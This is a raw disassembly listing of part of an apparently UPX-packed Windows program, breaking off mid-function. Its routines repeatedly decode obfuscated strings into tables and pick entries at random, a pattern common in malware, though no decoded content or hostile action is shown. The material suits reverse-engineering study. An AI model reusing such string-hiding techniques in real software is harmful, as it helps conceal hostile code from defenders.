push offset dword_429B8C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_A3C]
loc_40E018: ; CODE XREF: sub_40D9F0+630�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E018
push 0Fh
push offset dword_429B94
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_A7C]
lea ebx, [ebx+0]
loc_40E040: ; CODE XREF: sub_40D9F0+658�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E040
push 0Fh
push offset dword_429BA4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_ABC]
loc_40E062: ; CODE XREF: sub_40D9F0+67A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E062
push 16h
push offset dword_429BB4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_AFC]
loc_40E084: ; CODE XREF: sub_40D9F0+69C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E084
push 0Dh
push offset dword_429BCC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_B3C]
loc_40E0A6: ; CODE XREF: sub_40D9F0+6BE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E0A6
push 10h
push offset dword_429BDC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_B7C]
loc_40E0C8: ; CODE XREF: sub_40D9F0+6E0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E0C8
push 10h
push offset loc_429BEC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_BBC]
lea ebx, [ebx+0]
loc_40E0F0: ; CODE XREF: sub_40D9F0+708�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E0F0
push 0Bh
push offset dword_429BFC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_BFC]
loc_40E112: ; CODE XREF: sub_40D9F0+72A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E112
push 0Fh
push offset dword_429C08
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_C3C]
loc_40E134: ; CODE XREF: sub_40D9F0+74C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E134
push 0Bh
push offset dword_429C18
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_C7C]
loc_40E156: ; CODE XREF: sub_40D9F0+76E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E156
push 0Ch
push offset dword_429C24
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_CBC]
loc_40E178: ; CODE XREF: sub_40D9F0+790�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E178
push 0Eh
push offset dword_429C30
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_CFC]
lea ebx, [ebx+0]
loc_40E1A0: ; CODE XREF: sub_40D9F0+7B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E1A0
push 0Eh
push offset dword_429C40
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_D3C]
loc_40E1C2: ; CODE XREF: sub_40D9F0+7DA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E1C2
push 0Ah
push offset dword_429C50
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_D7C]
loc_40E1E4: ; CODE XREF: sub_40D9F0+7FC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E1E4
push 0Ah
push offset loc_429C5C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_DBC]
loc_40E206: ; CODE XREF: sub_40D9F0+81E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E206
push 0Ah
push offset dword_429C68
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_DFC]
loc_40E228: ; CODE XREF: sub_40D9F0+840�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E228
push 14h
push offset dword_429C74
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_E3C]
lea ebx, [ebx+0]
loc_40E250: ; CODE XREF: sub_40D9F0+868�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E250
push 0Fh
push offset dword_429C88
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_E7C]
loc_40E272: ; CODE XREF: sub_40D9F0+88A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E272
push 0Bh
push offset dword_429C98
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_EBC]
loc_40E294: ; CODE XREF: sub_40D9F0+8AC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E294
push 0Ah
push offset loc_429CA4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_EFC]
loc_40E2B6: ; CODE XREF: sub_40D9F0+8CE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E2B6
push 0Dh
push offset dword_429CB0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_F3C]
loc_40E2D8: ; CODE XREF: sub_40D9F0+8F0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E2D8
push 0Dh
push offset dword_429CC0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_F7C]
lea ebx, [ebx+0]
loc_40E300: ; CODE XREF: sub_40D9F0+918�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E300
push 8
push offset dword_429CD0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_FBC]
loc_40E322: ; CODE XREF: sub_40D9F0+93A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E322
call sub_419853
and eax, 8000003Fh
jns short loc_40E33D
dec eax
or eax, 0FFFFFFC0h
inc eax
loc_40E33D: ; CODE XREF: sub_40D9F0+946�j
shl eax, 6
lea eax, [esp+eax+0Ch]
mov edx, eax
loc_40E346: ; CODE XREF: sub_40D9F0+95B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E346
sub eax, edx
dec ebx
mov edi, ebx
loc_40E352: ; CODE XREF: sub_40D9F0+968�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40E352
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+0Ch+arg_FFC]
pop edi
pop esi
mov eax, 1
pop ebx
call sub_4192B6
add esp, 1004h
retn
sub_40D9F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E390 proc near ; CODE XREF: sub_40E6E0+3A�p
; sub_40E7E0+3F�p
arg_0 = dword ptr 4
push esi
push 9
push offset dword_429CD8
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, [esp+4+arg_0]
mov edx, esi
loc_40E3A8: ; CODE XREF: sub_40E390+20�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E3A8
push 7
push offset dword_429CE4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+40h]
loc_40E3C6: ; CODE XREF: sub_40E390+3E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E3C6
push 8
push offset dword_429CEC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+80h]
loc_40E3E7: ; CODE XREF: sub_40E390+5F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E3E7
push 9
push offset dword_429CF4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+0C0h]
loc_40E408: ; CODE XREF: sub_40E390+80�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E408
push 9
push offset dword_429D00
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+100h]
lea esp, [esp+0]
loc_40E430: ; CODE XREF: sub_40E390+A8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E430
push 0Ah
push offset loc_429D0C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+140h]
loc_40E451: ; CODE XREF: sub_40E390+C9�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E451
push 9
push offset dword_429D18
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+180h]
loc_40E472: ; CODE XREF: sub_40E390+EA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E472
push 5
push offset dword_429D24
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+1C0h]
loc_40E493: ; CODE XREF: sub_40E390+10B�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E493
push 0Bh
push offset dword_429D2C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+200h]
loc_40E4B4: ; CODE XREF: sub_40E390+12C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E4B4
push 9
push offset dword_429D38
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+240h]
loc_40E4D5: ; CODE XREF: sub_40E390+14D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E4D5
push 0Ah
push offset dword_429D44
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+280h]
loc_40E4F6: ; CODE XREF: sub_40E390+16E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E4F6
push 0Ah
push offset dword_429D50
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+2C0h]
loc_40E517: ; CODE XREF: sub_40E390+18F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E517
push 5
push offset dword_429D5C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+300h]
loc_40E538: ; CODE XREF: sub_40E390+1B0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E538
push 8
push offset dword_429D64
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+340h]
lea esp, [esp+0]
loc_40E560: ; CODE XREF: sub_40E390+1D8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E560
push 8
push offset dword_429D6C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+380h]
pop esi
loc_40E582: ; CODE XREF: sub_40E390+1FA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E582
mov eax, 0Fh
retn
sub_40E390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E5A0 proc near ; CODE XREF: sub_40E760+3A�p
arg_0 = dword ptr 4
push esi
push 0Bh
push offset dword_429D74
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, [esp+4+arg_0]
mov edx, esi
loc_40E5B8: ; CODE XREF: sub_40E5A0+20�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E5B8
push 0Bh
push offset dword_429D80
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+40h]
loc_40E5D6: ; CODE XREF: sub_40E5A0+3E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E5D6
push 0Ah
push offset dword_429D8C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+80h]
loc_40E5F7: ; CODE XREF: sub_40E5A0+5F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E5F7
push 1Bh
push offset dword_429D98
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+0C0h]
loc_40E618: ; CODE XREF: sub_40E5A0+80�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E618
push 12h
push offset dword_429DB4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+100h]
lea esp, [esp+0]
loc_40E640: ; CODE XREF: sub_40E5A0+A8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E640
push 17h
push offset dword_429DC8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+140h]
loc_40E661: ; CODE XREF: sub_40E5A0+C9�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E661
push 1Bh
push offset dword_429DE0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+180h]
loc_40E682: ; CODE XREF: sub_40E5A0+EA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E682
push 12h
push offset dword_429DFC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+1C0h]
loc_40E6A3: ; CODE XREF: sub_40E5A0+10B�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E6A3
push 17h
push offset dword_429E10
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+200h]
pop esi
loc_40E6C5: ; CODE XREF: sub_40E5A0+12D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E6C5
mov eax, 9
retn
sub_40E5A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E6E0 proc near ; CODE XREF: sub_40BE50+18�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 404h
mov eax, dword_42A290
push edi
mov edi, [esp+408h+arg_0]
test edi, edi
mov [esp+408h+var_4], eax
jnz short loc_40E714
xor eax, eax
pop edi
mov ecx, [esp+404h+var_4]
call sub_4192B6
add esp, 404h
retn
; ---------------------------------------------------------------------------
loc_40E714: ; CODE XREF: sub_40E6E0+1C�j
lea eax, [esp+408h+var_404]
push esi
push eax
call sub_40E390
add esp, 4
mov esi, eax
call sub_419853
cdq
idiv esi
pop esi
shl edx, 6
lea eax, [esp+edx+408h+var_404]
mov edx, edi
sub edx, eax
loc_40E738: ; CODE XREF: sub_40E6E0+60�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40E738
mov ecx, [esp+408h+var_4]
mov eax, 1
pop edi
call sub_4192B6
add esp, 404h
retn
sub_40E6E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E760 proc near ; CODE XREF: sub_402550+BA�p
; UPX0:00406E44�p ...
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 404h
mov eax, dword_42A290
push edi
mov edi, [esp+408h+arg_0]
test edi, edi
mov [esp+408h+var_4], eax
jnz short loc_40E794
xor eax, eax
pop edi
mov ecx, [esp+404h+var_4]
call sub_4192B6
add esp, 404h
retn
; ---------------------------------------------------------------------------
loc_40E794: ; CODE XREF: sub_40E760+1C�j
lea eax, [esp+408h+var_404]
push esi
push eax
call sub_40E5A0
add esp, 4
mov esi, eax
call sub_419853
cdq
idiv esi
pop esi
shl edx, 6
lea eax, [esp+edx+408h+var_404]
mov edx, edi
sub edx, eax
loc_40E7B8: ; CODE XREF: sub_40E760+60�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40E7B8
mov ecx, [esp+408h+var_4]
mov eax, 1
pop edi
call sub_4192B6
add esp, 404h
retn
sub_40E760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E7E0 proc near ; CODE XREF: sub_40BE50+9�p
var_508 = byte ptr -508h
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 508h
mov eax, dword_42A290
mov [esp+508h+var_4], eax
mov eax, [esp+508h+arg_0]
lea edx, [esp+508h+var_508]
sub edx, eax
mov edi, edi
loc_40E800: ; CODE XREF: sub_40E7E0+28�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40E800
push ebp
push esi
lea eax, [esp+510h+var_508]
push edi
push eax
call sub_419A76
lea ecx, [esp+518h+var_404]
push ecx
call sub_40E390
mov edi, eax
add esp, 8
xor ebp, ebp
xor esi, esi
test edi, edi
jle short loc_40E88F
push ebx
lea ebx, [esp+518h+var_404]
lea esp, [esp+0]
loc_40E840: ; CODE XREF: sub_40E7E0+78�j
lea edx, [esp+518h+var_508]
push ebx
push edx
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_40E873
inc esi
add ebx, 40h
cmp esi, edi
jl short loc_40E840
pop ebx
pop edi
pop esi
mov eax, ebp
pop ebp
mov ecx, [esp+508h+var_4]
call sub_4192B6
add esp, 508h
retn
; ---------------------------------------------------------------------------
loc_40E873: ; CODE XREF: sub_40E7E0+70�j
pop ebx
pop edi
pop esi
mov eax, 1
pop ebp
mov ecx, [esp+508h+var_4]
call sub_4192B6
add esp, 508h
retn
; ---------------------------------------------------------------------------
loc_40E88F: ; CODE XREF: sub_40E7E0+4F�j
mov ecx, [esp+514h+var_4]
pop edi
pop esi
mov eax, ebp
pop ebp
call sub_4192B6
add esp, 508h
retn
sub_40E7E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E8B0 proc near ; CODE XREF: sub_402550+D1�p
; sub_409710+1A0�p ...
var_404 = byte ptr -404h
var_3C4 = byte ptr -3C4h
var_384 = word ptr -384h
var_382 = byte ptr -382h
var_344 = word ptr -344h
var_342 = byte ptr -342h
var_304 = byte ptr -304h
var_2C4 = byte ptr -2C4h
var_284 = byte ptr -284h
var_244 = byte ptr -244h
var_204 = byte ptr -204h
var_1C4 = byte ptr -1C4h
var_184 = byte ptr -184h
var_144 = byte ptr -144h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 404h
mov eax, dword_42A290
push esi
mov esi, [esp+408h+arg_0]
test esi, esi
mov [esp+408h+var_4], eax
jnz short loc_40E8E4
xor eax, eax
pop esi
mov ecx, [esp+404h+var_4]
call sub_4192B6
add esp, 404h
retn
; ---------------------------------------------------------------------------
loc_40E8E4: ; CODE XREF: sub_40E8B0+1C�j
push 5
push offset dword_429E28
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_404]
lea esp, [esp+0]
loc_40E900: ; CODE XREF: sub_40E8B0+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E900
push 5
push offset dword_429E30
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_3C4]
nop
loc_40E920: ; CODE XREF: sub_40E8B0+78�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E920
mov ax, word_424530
mov cl, byte_424532
mov dx, word_42452C
mov [esp+408h+var_384], ax
mov al, byte_42452E
push 0Bh
mov [esp+40Ch+var_382], cl
push offset dword_429E38
mov ecx, offset off_42AE60
mov [esp+410h+var_344], dx
mov [esp+410h+var_342], al
call sub_406AE0
lea edx, [esp+408h+var_304]
loc_40E978: ; CODE XREF: sub_40E8B0+D0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E978
push 0Dh
push offset dword_429E44
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_2C4]
lea ebx, [ebx+0]
loc_40E9A0: ; CODE XREF: sub_40E8B0+F8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E9A0
push 0Ah
push offset dword_429E54
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_284]
loc_40E9C2: ; CODE XREF: sub_40E8B0+11A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E9C2
push 7
push offset dword_429E60
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_244]
loc_40E9E4: ; CODE XREF: sub_40E8B0+13C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E9E4
push 0Ah
push offset dword_429E68
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_204]
loc_40EA06: ; CODE XREF: sub_40E8B0+15E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EA06
push 0Ch
push offset dword_429E74
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_1C4]
loc_40EA28: ; CODE XREF: sub_40E8B0+180�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EA28
push 16h
push offset dword_429E80
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_184]
lea ebx, [ebx+0]
loc_40EA50: ; CODE XREF: sub_40E8B0+1A8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EA50
push 0Dh
push offset dword_429E98
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_144]
loc_40EA72: ; CODE XREF: sub_40E8B0+1CA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EA72
push 12h
push offset dword_429EA8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_104]
loc_40EA94: ; CODE XREF: sub_40E8B0+1EC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EA94
call sub_419853
cdq
mov ecx, 0Dh
idiv ecx
shl edx, 6
lea eax, [esp+edx+408h+var_404]
mov edx, esi
sub edx, eax
loc_40EAB6: ; CODE XREF: sub_40E8B0+20E�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40EAB6
mov ecx, [esp+408h+var_4]
mov eax, 1
pop esi
call sub_4192B6
add esp, 404h
retn
sub_40E8B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EAE0 proc near ; CODE XREF: sub_402550+DB�p
; sub_409710+1AF�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40EAED
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EAED: ; CODE XREF: sub_40EAE0+7�j
push 5
push offset dword_429EBC
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, esi
loc_40EB00: ; CODE XREF: sub_40EAE0+28�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EB00
mov eax, 1
pop esi
retn
sub_40EAE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EB20 proc near ; CODE XREF: sub_402550+C4�p
; sub_409710+191�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40EB2D
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EB2D: ; CODE XREF: sub_40EB20+7�j
call sub_419853
cdq
mov ecx, 3
idiv ecx
mov ecx, offset off_42AE60
push 5
test edx, edx
jnz short loc_40EB62
push offset dword_429EC4
call sub_406AE0
mov edx, esi
loc_40EB51: ; CODE XREF: sub_40EB20+39�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EB51
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EB62: ; CODE XREF: sub_40EB20+23�j
push offset dword_429ECC
call sub_406AE0
mov edx, esi
mov edi, edi
loc_40EB70: ; CODE XREF: sub_40EB20+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EB70
mov eax, 1
pop esi
retn
sub_40EB20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EB90 proc near ; CODE XREF: sub_409710+D6�p
var_404 = byte ptr -404h
var_3C4 = byte ptr -3C4h
var_384 = byte ptr -384h
var_344 = byte ptr -344h
var_304 = byte ptr -304h
var_2C4 = byte ptr -2C4h
var_284 = byte ptr -284h
var_244 = byte ptr -244h
var_204 = byte ptr -204h
var_1C4 = byte ptr -1C4h
var_184 = byte ptr -184h
var_144 = byte ptr -144h
var_104 = byte ptr -104h
var_C4 = byte ptr -0C4h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 404h
mov eax, dword_42A290
push esi
mov esi, [esp+408h+arg_0]
test esi, esi
mov [esp+408h+var_4], eax
jnz short loc_40EBC4
xor eax, eax
pop esi
mov ecx, [esp+404h+var_4]
call sub_4192B6
add esp, 404h
retn
; ---------------------------------------------------------------------------
loc_40EBC4: ; CODE XREF: sub_40EB90+1C�j
push 4
push offset dword_429ED4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_404]
lea esp, [esp+0]
loc_40EBE0: ; CODE XREF: sub_40EB90+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EBE0
push 8
push offset dword_429ED8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_3C4]
nop
loc_40EC00: ; CODE XREF: sub_40EB90+78�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EC00
push 6
push offset dword_429EE0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_384]
loc_40EC22: ; CODE XREF: sub_40EB90+9A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EC22
push 0Ah
push offset dword_429EE8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_344]
loc_40EC44: ; CODE XREF: sub_40EB90+BC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EC44
push 9
push offset dword_429EF4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_304]
loc_40EC66: ; CODE XREF: sub_40EB90+DE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EC66
push 9
push offset dword_429F00
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_2C4]
loc_40EC88: ; CODE XREF: sub_40EB90+100�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EC88
push 4
push offset dword_429F0C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_284]
lea ebx, [ebx+0]
loc_40ECB0: ; CODE XREF: sub_40EB90+128�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ECB0
push 7
push offset dword_429F10
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_244]
loc_40ECD2: ; CODE XREF: sub_40EB90+14A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ECD2
push 8
push offset dword_429F18
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_204]
loc_40ECF4: ; CODE XREF: sub_40EB90+16C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ECF4
push 5
push offset dword_429F20
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_1C4]
loc_40ED16: ; CODE XREF: sub_40EB90+18E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ED16
push 6
push offset dword_429F28
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_184]
loc_40ED38: ; CODE XREF: sub_40EB90+1B0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ED38
push 6
push offset dword_429F30
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_144]
lea ebx, [ebx+0]
loc_40ED60: ; CODE XREF: sub_40EB90+1D8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ED60
push 7
push offset dword_429F38
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_104]
loc_40ED82: ; CODE XREF: sub_40EB90+1FA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ED82
push 8
push offset dword_429F40
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+408h+var_C4]
loc_40EDA4: ; CODE XREF: sub_40EB90+21C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40EDA4
call sub_419853
cdq
mov ecx, 0Eh
idiv ecx
shl edx, 6
lea eax, [esp+edx+408h+var_404]
mov edx, esi
sub edx, eax
loc_40EDC6: ; CODE XREF: sub_40EB90+23E�j
mov cl, [eax]
